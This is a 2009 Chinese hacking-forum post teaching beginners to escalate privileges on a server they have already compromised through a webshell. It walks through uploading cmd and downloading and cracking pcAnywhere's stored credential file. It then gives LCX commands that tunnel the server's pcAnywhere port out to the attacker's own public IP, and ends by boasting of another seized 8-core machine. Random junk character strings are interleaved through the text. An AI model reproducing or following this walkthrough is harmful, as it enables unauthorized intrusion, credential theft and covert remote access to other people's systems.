|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
* e; j0 s7 ? [
" x0 y& D8 k/ Q* J( s提权方法:pcanywhere+LCX
( Y, @$ Z! Z5 Q; e q2 q- o
& o" |4 S* T7 y _' o& E获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
6 p3 \! d E- h
% v) F+ r) {1 o) D4 V: A7 s8 V4 O9 }在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。/ ]& }, E f4 q- Z$ f
; _( W2 N5 L9 F8 T9 o
9 \/ x5 m! ~2 k查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
5 u: v# y3 ~. V; P# X" c
& L8 S+ t! O! W- _ {
9 [6 Z! s$ G+ ?0 r7 j0 `呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。* h! ~' ?, R) W! S' v
# v: M) x# H9 w. X. S# X
: V9 N2 _& c- c- w" x: L
8 X; j% P/ g4 d% y
6 L( r9 b. n5 R4 @ x! P由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
w8 U/ o, f, Q/ i! ~9 T
& \% d5 `3 f6 h0 D+ h0 c4 R8 W6 B$ T& i j/ `- b! s8 Y/ W+ X2 @
LCX的用法再简单说下:# t! Y" n, |* M( B/ b8 K: W* r+ u, j
7 Y. D6 X7 L3 a; @
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)/ N# L. Q) _8 k w; O" g0 f: k
, z" z/ V+ t, ~' _) \0 l+ g* ^本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
" c; B" B/ H' p4 ~$ |4 B
) C$ _9 K/ ]/ ~由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。 O; v% J5 `2 w, Q2 T
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
6 A. B9 M2 R7 G8 O1 X1 X# v* W* i
% T9 `# o! B& t2 T. i; {+ h
8 l4 ^3 g% ^1 y- o! O# q. N4 v0 x
' t9 u2 y# l1 t! J+ M9 q" N呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
& O; H0 |! P V
8 C- W# j) x. ^/ I2 D$ }0 S! {. S# k7 o
/ N% |; P5 | S G& G& t5 @) i2 a# Y
我们本地连接试试,输入我们刚破解的账号密码
, R& }6 i" z, p b( T
; p: n4 }' B$ I Y! ^: a5 e+ B* P0 j# w! V) e
呵呵``连接成功,服务器不错,又一个8核^︵^
; e5 }+ D {$ \: b, u5 W7 _* H
2 z, r1 K& ^6 B2 |& l+ x( W3 F1 G* Z9 |6 w2 `" s% E
# l B& d- Z2 U
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
